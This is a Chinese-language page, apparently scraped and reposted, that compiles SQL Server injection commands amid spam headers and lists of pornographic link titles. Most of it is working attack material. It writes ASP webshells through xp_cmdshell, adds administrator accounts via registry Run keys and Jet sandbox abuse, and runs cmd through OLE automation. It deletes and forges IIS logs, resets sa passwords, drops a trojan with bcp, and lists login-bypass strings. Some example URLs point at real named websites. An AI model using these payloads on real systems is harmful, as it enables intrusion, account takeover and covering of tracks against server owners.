成人性生交大片免费看视频r_亚洲综合极品香蕉久久网_在线视频免费观看一区_亚洲精品亚洲人成人网在线播放_国产精品毛片av_久久久久国产精品www_亚洲国产一区二区三区在线播_日韩一区二区三区四区区区_亚洲精品国产无套在线观_国产免费www

主頁 > 知識(shí)庫 > 最詳細(xì)的SQL注入相關(guān)的命令整理 (轉(zhuǎn))第1/2頁

最詳細(xì)的SQL注入相關(guān)的命令整理 (轉(zhuǎn))第1/2頁

熱門標(biāo)簽:臨滄移動(dòng)外呼系統(tǒng)哪家有 怎么更改地圖標(biāo)注電話 交行外呼系統(tǒng)有哪些 防城港市ai電銷機(jī)器人 不同的地圖標(biāo)注 激戰(zhàn)黃昏地圖標(biāo)注說明 隨州銷售外呼系統(tǒng)平臺(tái) 溫嶺代理外呼系統(tǒng) 寧夏保險(xiǎn)智能外呼系統(tǒng)哪家好

 1、   用^轉(zhuǎn)義字符來寫ASP(一句話木馬)文件的方法:
?   http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^script language=VBScript runat=server^>execute request^("l"^)^/script^> >c:\mu.asp';-- 

?   echo ^%execute^(request^("l"^)^)%^> >c:\mu.asp

2、   顯示SQL系統(tǒng)版本: 
?   http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION) 
?   http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--

Microsoft VBScript 編譯器錯(cuò)誤 錯(cuò)誤 '800a03f6' 
缺少 'End' 
/iisHelp/common/500-100.asp,行242 
Microsoft OLE DB Provider for ODBC Drivers 錯(cuò)誤 '80040e07' 
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int. 
/display.asp,行17
3、   在檢測(cè)索尼中國的網(wǎng)站漏洞時(shí),分明已經(jīng)確定了漏洞存在卻無法在這三種漏洞中找到對(duì)應(yīng)的類型。偶然間我想到了在SQL語言中可以使用“in”關(guān)鍵字進(jìn)行查詢,例如“select * from mytable where id in(1)”,括號(hào)中的值就是我們提交的數(shù)據(jù),它的結(jié)果與使用“select * from mytable where id=1”的查詢結(jié)果完全相同。所以訪問頁面的時(shí)候在URL后面加上“) and 1=1 and 1 in(1”后原來的SQL語句就變成了“select * from mytable where id in(1) and 1=1 and 1 in(1)”,這樣就會(huì)出現(xiàn)期待已久的頁面了。暫且就叫這種類型的漏洞為“包含數(shù)字型”吧,聰明的你一定想到了還有“包含字符型”呢。對(duì)了,它就是由于類似“select * from mytable where name in('firstsee')”的查詢語句造成的。

4、   判斷xp_cmdshell擴(kuò)展存儲(chǔ)過程是否存在:
http://192.168.1.5/display.asp?keyno=188 and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
恢復(fù)xp_cmdshell擴(kuò)展存儲(chǔ)的命令:
http://www.test.com/news/show1.asp?NewsId=125272
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--

5、   向啟動(dòng)組中寫入命令行和執(zhí)行程序:
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'


6、   查看當(dāng)前的數(shù)據(jù)庫名稱:
?   http://192.168.1.5/display.asp?keyno=188 and 0>db_name(n) n改成0,1,2,3……就可以跨庫了
?   http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft VBScript 編譯器錯(cuò)誤 錯(cuò)誤 '800a03f6' 
缺少 'End' 
/iisHelp/common/500-100.asp,行242 
Microsoft OLE DB Provider for ODBC Drivers 錯(cuò)誤 '80040e07' 
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int. 
/display.asp,行17 
7、   列出當(dāng)前所有的數(shù)據(jù)庫名稱:
select * from master.dbo.sysdatabases   列出所有列的記錄
select name from master.dbo.sysdatabases 僅列出name列的記錄

8、   不需xp_cmdshell支持在有注入漏洞的SQL服務(wù)器上運(yùn)行CMD命令:
create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\&;c:\temp.txt','0','true'
--注意run的參數(shù)true指的是將等待程序運(yùn)行的結(jié)果,對(duì)于類似ping的長時(shí)間命令必需使用此參數(shù)。

EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
--因?yàn)閒so的opentextfile方法將返回一個(gè)textstream對(duì)象,所以此時(shí)@file是一個(gè)對(duì)象令牌

WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

drop TABLE MYTMP 

----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

以下是一行里面將WEB用戶加到管理員組中:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

以下是一行中執(zhí)行EXE程序:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\&;c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

SQL下三種執(zhí)行CMD命令的方法:

先刪除7.18號(hào)日志:
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

(3)首先開啟jet沙盤模式,通過擴(kuò)展存儲(chǔ)過程xp_regwrite修改注冊(cè)表實(shí)現(xiàn),管理員修改注冊(cè)表不能預(yù)防的原因。出于安全原因,默認(rèn)沙盤模式未開啟,這就是為什么需要xp_regwrite的原因,而xp_regwrite至少需要DB_OWNER權(quán)限,為了方便,這里建議使用sysadmin權(quán)限測(cè)試:
?   exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
注:
0   禁止一切(默認(rèn))
1   使能訪問ACCESS,但是禁止其它
2   禁止訪問ACCESS,但是使能其他
3   使能一切

?   這里僅給出sysadmin權(quán)限下使用的命令:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')


?   建立鏈接數(shù)據(jù)庫'L0op8ack'參考命令:
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'

?   如何使用鏈接數(shù)據(jù)庫:

使用這個(gè)方式可以執(zhí)行,但是很不幸,DB_OWNER權(quán)限是不夠的,需要至少sysadmin權(quán)限或者securityadmin+setupadmin權(quán)限組合
sp_addlinkedserver需要sysadmin或setupadmin權(quán)限
sp_addlinkedsrvlogin需要sysadmin或securityadmin權(quán)限
最終發(fā)現(xiàn),還是sa權(quán)限或者setupadmin+securityadmin權(quán)限帳戶才能使用,
一般沒有哪個(gè)管理員這么設(shè)置普通帳戶權(quán)限的

實(shí)用性不強(qiáng),僅作為一個(gè)學(xué)習(xí)總結(jié)吧

大致過程如下,如果不是sysadmin,那么IAS.mdb權(quán)限驗(yàn)證會(huì)出錯(cuò),
我測(cè)試的時(shí)候授予hacker這個(gè)用戶setupadmin+securityadmin權(quán)限,使用ias.mdb失敗
需要找一個(gè)一般用戶可訪問的mdb才可以:

?   新建鏈接服務(wù)器”L0op8ack”:EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';--
?   exec sp_addlinkedsrvlogin 'L0op8ack','false';--或
exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';--
?   select * FROM OPENQUERY(L0op8ack, 'select shell("cmd.exe /c net user")');--
?   exec sp_droplinkedsrvlogin 'L0op8ack','false';--
?   exec sp_dropserver 'L0op8ack';--

再考貝一個(gè)其它文件來代替7.18日文件:
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

(3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

9、   用update來更新表中的數(shù)據(jù):
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
www用戶密碼的16位MD5值為:a0b923820dcc509a,即把密碼改成1;
32位MD5值為:   ,密碼為

10、   利用表內(nèi)容導(dǎo)成文件功能
SQL有BCP命令,它可以把表的內(nèi)容導(dǎo)成文本文件并放到指定位置。利用這項(xiàng)功能,我們可以先建一張臨時(shí)表,然后在表中一行一行地輸入一個(gè)ASP木馬,然后用BCP命令導(dǎo)出形成ASP文件。
命令行格式如下:
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P upload('S'參數(shù)為執(zhí)行查詢的服務(wù)器,'U'參數(shù)為用戶名,'P'參數(shù)為密碼,最終上傳了一個(gè)runcommand.asp的木馬)。

11、創(chuàng)建表、播入數(shù)據(jù)和讀取數(shù)據(jù)的方法
?   創(chuàng)建表:
' and 1=1 union select 1,2,3,4;create table [dbo].[cyfd]([gyfd][char](255))--
?   往表里播入數(shù)據(jù):
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) select top 1 name from upload.dbo.sysobjects where xtype='U' and status>0,@result output insert into cyfd (gyfd) values(@result);--
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
?   從表里讀取數(shù)據(jù):
' and 1=(select count(*) from cyfd where gyfd >1)--

?   刪除臨時(shí)表:
';drop table cyfd;--

12、通過SQL語句直接更改sa的密碼:
?   update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01,這樣sa的密碼就被我們改成了111111拉。呵呵,解決的方法就是把sa給刪拉。,怎么刪可以參考我的《完全刪除sa這個(gè)后門》。

?   查看本機(jī)所有的數(shù)據(jù)庫用戶名:
select * from master.dbo.sysxlogins
select name,sid,password ,dbid from master.dbo.sysxlogins

?   更改sa口令方法:用sql綜合利用工具連接后,執(zhí)行命令:
exec sp_password NULL,'新密碼','sa'

13、查詢dvbbs庫中所有的表名和表結(jié)構(gòu):
?   select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
?   select * from dvbbs.dbo.syscolumns where id=1426104121

14、手工備份當(dāng)前數(shù)據(jù)庫:
完全備份:
;declare @a sysname,@s nvarchar(4000) 
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH formAT--
差異備份:
;declare @a sysname,@s nvarchar(4000) 
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,formAT—

15、添加和刪除一個(gè)SA權(quán)限的用戶test:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

cmd.exe /c isql -E /U alma /P /i K:\test.qry 

16、select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0 
就可以列出庫ChouYFD中所有的用戶建立的表名。
select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0

17、
?   http://www.npc.gov.cn/zgrdw/common/image_view.jsp?sqlstr=select * from rdweb.dbo.syscolumns (where id=1234)
列出rdweb庫中所有表中的字段名稱
?   select * from dvbbs.dbo.syscolumns where id=5575058 
列出庫dvbbs中表id=5575058的所有字段名

18、刪除記錄命令:delete from Dv_topic where boardid=5 and topicid=7978 

19、繞過登錄驗(yàn)證進(jìn)入后臺(tái)的方法整理:
1) ' or''='
2) ' or 1=1--
3) ' or 'a'='a--
4) 'or'='or'
5) " or 1=1-- 
6)or 1=1--
7) or 'a='a
8)" or "a"="a 
9) ') or ('a'='a
10) ") or ("a"="a
11) ) or (1=1
12) 'or''='
13) 人氣%' and 1=1 and '%'='

20、尋找網(wǎng)站路徑的方法匯總:
1)查看WEB網(wǎng)站安裝目錄命令:
?   cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt (將2換成1、3、4、5試試)
type c:\test1.txt
del c:\test1.txt
在NBSI下可以直接顯示運(yùn)行結(jié)果,所以不用導(dǎo)出到文件

2)在網(wǎng)站上隨便找到一個(gè)圖片的名字 123.jpg
然后寫進(jìn)批處理程序123.bat:
d:
dir 123.jpg /s >c:\123.txt
e:
dir 123.jpg /s >>c:\123.txt
f:
dir 123.jpg /s >>c:\123.txt

執(zhí)行后 type c:\123.txt
這樣來分析網(wǎng)站的路徑

3)SQL服務(wù)器和網(wǎng)站服務(wù)器在同一個(gè)服務(wù)器上,好了是可以執(zhí)行命令是吧?
將執(zhí)行命令輸出結(jié)果到
%windir%\help\iishelp\common\404b.htm或者500.asp
注意輸出前Backup這兩個(gè)文件
如:
dir c:\&;>%windir%\help\iishelp\common\404b.htm
然后隨便輸入一個(gè)文件來訪問:http://目標(biāo)ip/2.asp 

4)針對(duì)win2000系統(tǒng):xp_regread讀取HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots 獲取WEB路徑
2003系統(tǒng):xp_regread讀取,未找到方法
如:
(1)   新建一個(gè)表cyfd(字段為gyfd):http://www.cnwill.com/NewsShow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--
(2)   把web路徑寫進(jìn)去:http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);-- 
(3)   還是讓他不匹配,顯示錯(cuò)誤:http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1) 
Source: .Net SqlClient Data Provider
Description: 將 varchar 值 'Y:\Web\煙臺(tái)人才熱線后臺(tái)管理系統(tǒng),,201 ' 轉(zhuǎn)換為數(shù)據(jù)類型為 int 的列時(shí)發(fā)生語法錯(cuò)誤。
TargeSite: Boolean Read() 哈哈哈。。路徑暴露了。。
(4)接下來刪除表:http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--

5)用regedit命令導(dǎo)出注冊(cè)表,將導(dǎo)出的結(jié)果保存的路徑到%windir%\help\iishelp\common\404b.htm或者500.asp頁面
regedit命令說明:
Regedit /L:system /R:user /E filename.reg Regpath
參數(shù)含義:
/L:system指定System.dat文件所在的路徑。
/R:user指定User.dat文件所在的路徑。
/E:此參數(shù)指定注冊(cè)表編輯器要進(jìn)行導(dǎo)出注冊(cè)表操作,在此參數(shù)后面空一格,輸入導(dǎo)出注冊(cè)表的文件名。
Regpath:用來指定要導(dǎo)出哪個(gè)注冊(cè)表的分支,如果不指定,則將導(dǎo)出全部注冊(cè)表分支。在這些參數(shù)中,"/L:system"和"/R:user"參數(shù)是可選項(xiàng),如果不使用這兩個(gè)參數(shù),注冊(cè)表編輯器則認(rèn)為是對(duì)WINDOWS目錄下的"system.dat"和"user.dat"文件進(jìn)行操作。如果是通過從軟盤啟動(dòng)并進(jìn)入DOS,那么就必須使用"/L"和"/R"參數(shù)來指定"system.dat"和"user.dat"文件的具體路徑,否則注冊(cè)表編輯器將無法找到它們。比如說,如果通過啟動(dòng)盤進(jìn)入DOS,則備份注冊(cè)表的命令是"Regedit /L:C:\windows\/R:C:\windows\/e regedit.reg",該命令的意思是把整個(gè)注冊(cè)表備份到WINDOWS目錄下,其文件名為"regedit.reg"。而如果輸入的是"regedit /E D:\regedit.reg"這條命令,則是說把整個(gè)注冊(cè)表備份到D盤的根目錄下(省略了"/L"和"/R"參數(shù)),其文件名為"Regedit.reg"。

regedit /s c:\adam.reg (導(dǎo)入c:\adam.reg文件至注冊(cè)表)
regedit /e c:\web.reg (備份全部注冊(cè)內(nèi)容到c:\web.reg中)
針對(duì)win2000系統(tǒng):C:\&;regedit /e %windir%\help\iishelp\common\404b.htm "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
然后http://目標(biāo)IP/2.asp
針對(duì)win2003系統(tǒng):沒有找到,希望找到的朋友公布出來一起討論。

6)虛擬主機(jī)下%SystemRoot%\system32\inetsrv\MetaBack\下的文件是iis的備份文件,是允許web用戶訪問的,如果你的iis備份到這里,用webshell下載下來后用記事本打開,可以獲取對(duì)應(yīng)的域名和web絕對(duì)路徑。

7)SQL注入建立虛擬目錄,有dbo權(quán)限下找不到web絕對(duì)路徑的一種解決辦法:
我們很多情況下都遇到SQL注入可以列目錄和運(yùn)行命令,但是卻很不容易找到web所在目錄,也就不好得到一個(gè)webshell,這一招不錯(cuò): 
?   建立虛擬目錄win,指向c:\winnt\system32:exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"' 
?   讓win目錄具有解析asp腳本權(quán)限:exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/Accessexecute "true" –s:' 
?   刪除虛擬目錄win:exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
?   測(cè)試:http://127.0.0.1/win/test.asp

12下一頁閱讀全文
您可能感興趣的文章:
  • php中sql注入漏洞示例 sql注入漏洞修復(fù)
  • php防止sql注入代碼實(shí)例
  • php防止SQL注入詳解及防范
  • sql注入與轉(zhuǎn)義的php函數(shù)代碼
  • php中防止SQL注入的最佳解決方法

標(biāo)簽:青海 忻州 河源 阜陽 沈陽 無錫 紅河 哈密

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《最詳細(xì)的SQL注入相關(guān)的命令整理 (轉(zhuǎn))第1/2頁》,本文關(guān)鍵詞  最詳,細(xì)的,SQL,注入,相關(guān),;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《最詳細(xì)的SQL注入相關(guān)的命令整理 (轉(zhuǎn))第1/2頁》相關(guān)的同類信息!
  • 本頁收集關(guān)于最詳細(xì)的SQL注入相關(guān)的命令整理 (轉(zhuǎn))第1/2頁的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    欧美第一页在线观看| 中文字幕制服丝袜| 裸体一区二区三区| 欧美jizz18性欧美| 狠狠久久亚洲欧美专区| 欧美性感美女h网站在线观看免费| 久草中文在线视频| 在线精品亚洲欧美日韩国产| 国产一区二区三区在线观看| 久久久噜噜噜久久久| 亚洲色图第四色| 亚洲精品国产精品国自产观看| 欧美下载看逼逼| 欧美一二三区精品| 欧美成人精品不卡视频在线观看| 欧美激情乱人伦| 色哟哟网站入口亚洲精品| 91精品国产综合久久小美女| 国产aⅴ夜夜欢一区二区三区| 夜夜躁日日躁狠狠久久av| 欧美xxx.com| 91精品久久久久久久久久入口| 91精品国产自产91精品| 妖精视频一区二区| 免费影院在线观看一区| 国模叶桐国产精品一区| 欧美精品日韩在线| xxxx黑人da| 中文字幕一区二区三区av| 久久一区国产| 久久久精品电影| 色婷婷一区二区三区| 日韩成人一区二区三区在线观看| 忘忧草在线影院两性视频| 国产视频丨精品|在线观看| 国产视频911| 偷拍国模大尺度视频在线播放| xxxx 国产| 黑人巨大精品一区二区在线| av不卡在线看| 国产在线一区二区三区播放| 九色91蝌蚪在线| 欧美日韩国产中文精品字幕自在自线| 国产在线天堂www网在线观看| 国产jizz18女人高潮| 中文xxx视频| 日韩美女网站| 少妇人妻好深好紧精品无码| 高清欧美精品xxxxx| 午夜视频在线免费看| 欧美亚洲综合一区| 亚洲乱码中文字幕综合| 在线播放evaelfie极品| 色鬼7777久久| 91超碰中文字幕久久精品| 亚洲一区不卡| 凹凸精品一区二区三区| 青青草观看免费视频在线| 外国成人在线视频| 亚洲美女精品视频| 亚洲精品视频免费| 丰满少妇中文字幕| 一本一道综合狠狠老| 91精品国产综合久久香蕉最新版| 国产欧美精品一区二区三区四区| 亚洲精品欧美在线| 亚洲成人av免费| 久草视频福利在线| av大片在线免费观看| 一区二区三区在线视频观看58| 中文字幕在线播放视频| 国产精品777777在线播放| 国自在线精品视频| 中文字幕天堂av| 粉嫩tv在线播放| 免费一级欧美片在线播放| 久久国产精品99国产精| 欧美日韩国内| 国产人妻精品一区二区三区| 水蜜桃亚洲一二三四在线| 久久精品色播| 妺妺窝人体色WWW精品| 一本色道婷婷久久欧美| 久久午夜激情| 亚洲精品国产成人影院| 麻豆久久久久| 欧美日韩视频在线| 国产成人av资源| 国产精品免费电影| 色综合欧美在线| 国产亚洲va综合人人澡精品| 国产精品av久久久久久无| 国产三区二区一区久久| 免费毛片小视频| 天天操夜夜操视频| 国产亚洲欧美日韩精品| www.xxxx精品| 欧美激情无毛| 老女人性生活视频| 乱色精品无码一区二区国产盗| 99视频精品全部免费在线视频| 日韩中文字幕网| 欧美日韩国产小视频| 人交獸av完整版在线观看| 国产福利一区二区三区视频| 久久久久久女乱国产| 香蕉视频官网在线观看日本一区二区| 亚洲第一色av| 成人深夜直播免费观看| 成人白浆超碰人人人人| 超碰成人福利网| 91一区二区在线| 国产一区二区三区高清| 日韩一区不卡| 国产一区二区三区在线播放免费观看| 国产成人免费视频| 国产亚洲美女久久| 日韩av不卡在线观看| 99精品国产在热久久婷婷| 久久艹中文字幕| 亚洲宅男天堂在线观看无病毒| 麻豆国产入口在线观看免费| 五月天精品在线| 精品一区中文字幕| 国产精品xxx电影| av在线播放一区| 福利片在线看| 色8久久精品久久久久久蜜| 91网页版在线| 1区2区在线观看| 青青草精品视频| 午夜精品99久久免费| 一区二区三区在线看| 亚洲一卡二卡在线观看| 亚洲精品一区二区三区网址| 欧美性猛交视频| 欧美久久综合| 四虎国产成人永久精品免费| 国产精品入口麻豆完整版| 成人av网站大全| 国产精品成人网| 国偷自产一区二区免费视频| 综合国产精品| 先锋影音av男人站| 四虎影视精品| **女人18毛片一区二区| 97精品国产aⅴ7777| 性欧美videosex高清少妇| 欧美日韩国产在线观看| 丁香天五香天堂综合| baoyu135国产精品免费| 韩日毛片在线观看| 精品网站在线看| 激情视频一区二区| 亚洲网友自拍偷拍| 午夜视频在线免费看| 日韩精品中文字幕在线观看| 久久精品最新免费国产成人| 成人18网站| 久久99国产精品二区高清软件| 5252色成人免费视频| 亚洲日本中文字幕免费在线不卡| 麻豆精品国产传媒mv男同| 精品国产中文字幕| 久久久久久69| 欧美性一区二区三区| av网站网址在线观看| 亚洲综合123| 国产中文av在线| 日韩黄色片在线观看| 日韩黄色片在线观看| 欧美成人777| 狠狠综合久久| 国产超碰人人爽人人做人人爱| 亚洲色图27p| 亚洲欧美精品在线| 91黑丝在线观看| 日本一级片免费看| 国产精品一区牛牛影视| 免费人成短视频在线观看网站| 一个人看的www久久| 国产精品无码粉嫩小泬| 亚洲一区二区三区四区| 91精品国产综合久久福利软件| 免费能直接在线观看黄的视频| 91色综合久久久久婷婷| 99re8在线精品视频免费播放| 99热这里只有成人精品国产| 日韩视频第一页| 欧美理论片在线播放| 综合激情丁香| 久久久久久久国产精品影院| 成人性教育av免费网址| 久久日.com| 亚洲第一导航| 国产成人一区二区三区电影| 亚洲欧洲日产国产综合网| 国产欧美日韩综合一区在线观看| 视频在线不卡免费观看| 97视频资源在线观看| 视频精品国内| 亚洲激情五月| 欧美va天堂| 糖心vlog免费在线观看| 国产精品久久久久久久久免费高清| 97人人模人人爽人人少妇| 新天天拍日日拍狠狠拍| 日韩精品视频免费专区在线播放| 中文文字幕一区二区三三| 97人人爽人人爽人人爽| 深夜爽爽视频| xxxx 国产| 曰本一区二区三区视频| 久久精品一区八戒影视| 奇米一区二区三区四区久久| 天天爽夜夜爽夜夜爽精品| 国产人妻人伦精品1国产丝袜| 欧美尿孔扩张虐视频| 精品在线一区二区三区| 国产一级在线| 亚洲精品一区av在线播放| 肥臀熟女一区二区三区| 中文字幕精品影院| 欧美美女色图| 欧美一二区视频| 成人avav影音| 日韩一区二区三区在线| 亚洲区欧美区| 在线观看国产福利视频| 四虎永久免费在线| 亚洲青色在线| 日韩中文字幕高清| 国产wwwxxx| 亚洲乱码国产乱码精品精可以看| 麻豆成人免费视频| 欧美国产一区二区在线观看| 亚洲一区二区在线观| 日韩av电影免费观看| 亚洲精选久久| 日韩综合在线| 中文字幕在线视频一区二区三区| 黄网站免费入口| a级一a一级在线观看| 黄色一级大片在线免费观看| 波多野结衣的一区二区三区| 久久国产一区| 成人全视频在线观看在线播放高清| 